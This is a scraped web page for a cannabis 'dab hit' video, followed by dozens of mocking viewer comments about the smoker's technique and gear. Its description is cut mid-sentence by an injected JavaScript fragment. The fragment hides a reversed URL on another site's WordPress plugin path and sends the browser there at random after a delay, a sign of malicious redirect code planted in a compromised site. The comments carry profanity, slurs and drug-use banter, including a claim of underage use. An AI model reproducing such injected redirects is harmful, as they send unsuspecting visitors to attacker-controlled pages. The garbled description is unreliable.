BIG dab hit…..FAIL

After about smoking 2 grams of oil, mistakes are ought toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to happen..

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41 thoughts on “BIG dab hit…..FAIL”

  1. King Deezyy says:

    Nice baby dab

  2. rastaN1PPL3S says:

    do yourself a favor, invest in a titanium dome less nail

  3. d pooty says:

    thats not very much

  4. mydickhurts says:

    I'm 16 and I can hit better than that

  5. Faded says:

    Worst rig ever

  6. Faded says:

    Worst rig ever

  7. Jay Budz says:

    Wax is way too harsh for me. I prefer to stick to flowers

  8. Gabe's 805 says:

    That was apussy hit and it was dirty wax I can tell by the way it burned on the skillet and you call that fat hahhaa that shit was green.if you smoke wax and know about it youknow what I mean

  9. themilkman3333 says:

    This guy is a fucking retard.

  10. lt250 says:

    Love all the shit talking:d

  11. Hunter Tomlinson says:

    The only thing funny about this video is the shit you're smoking.

  12. xzavier parker says:

    I don't understand how people get this high

  13. Onyx Coleman says:

    That was the smallest dab hit I've ever seen in my life

  14. iDrift Godly says:

    dumb kids in there parents garage smoking weed, looking like idioits

  15. Efren Barragan says:

    How are you going to torch it that long and not way for it to cool down, pathetic . Lol

  16. kobie martinez says:

    things went pretty well in my opinion

  17. Mrsome1panda says:

    I don't think it was hot enough

  18. TheBuddylove420 says:

    Got it wayyyy to hot

  19. kevin kosa says:

    This kid is such a lick. Stick to smoking a bowl or something, get some more experience.

  20. Brandon Kolkana says:

    Dirty wax should of burnt clean nothing left

  21. Mino Reyna says:

    wtf this video looks like you heating up some fuckin heroin dude. not dabs do you not own a silicon container? lol  

  22. qumelenfurlog says:

    Wtf is left on your nail. Your having kief left over in your shoot which means either your pressing or blowing the tube through after you shoot or your using the wrong screen size or one coffee filter try 2. One way or another that big black glob on your swing is not good.

  23. lilkck13 says:

    the universal face of a bong hit;)

  24. Alec says:

    anybody else realize that hes not even using a downstem? water in there is pointless lol

  25. HaroldMay420 says:

    Weak hit.

  26. Ijusttokin says:

    That was the tiniest dab I've ever seen homie,look at my video for a fat ass dab

  27. CreamyGoodness47 says:

    Dabs are the modern day dunce cap

  28. Crispchin Hunt says:

    I love how smoking is now a COMPETITION for some reason? Stfu and enjoy the shit. Live your life. We don't all need a fucking gram dab.

  29. E L says:

    The boss half gallon

  30. Idotattoos CA says:

    why did he heat the what ever the fuck that is hella times?? dude is weak SMH making us look bad nad why do people always hit it then blown the smoke out and kill there hit stop being a bitch and kill the whole thing

  31. masterkush95 says:

    Bitch dab ^.^

  32. Mista C says:

    It took this guy forever to prepare that little ass dab. I can roll a spliff quicker than that.

  33. Deeper says:

    IS there a dumber way to do that?

  34. Robert Nicholas says:

    haha fuckin noobs

  35. Barron White-Bird says:

    that's not the hottest part of Laflamme, but concentrates are fucking nuts compared to bud

  36. Joey Paris says:

    ill just sum up the comments to save everyone time. his rig is retarded. theres no downstem to his bong, the wax looked dirty as fuck, the dab wasnt even big, and he couldnt handle that small amount

  37. brian dunn says:

    heated it way too much

  38. RollaJ420 says:

    You got about $30 floating around in your bong bud.

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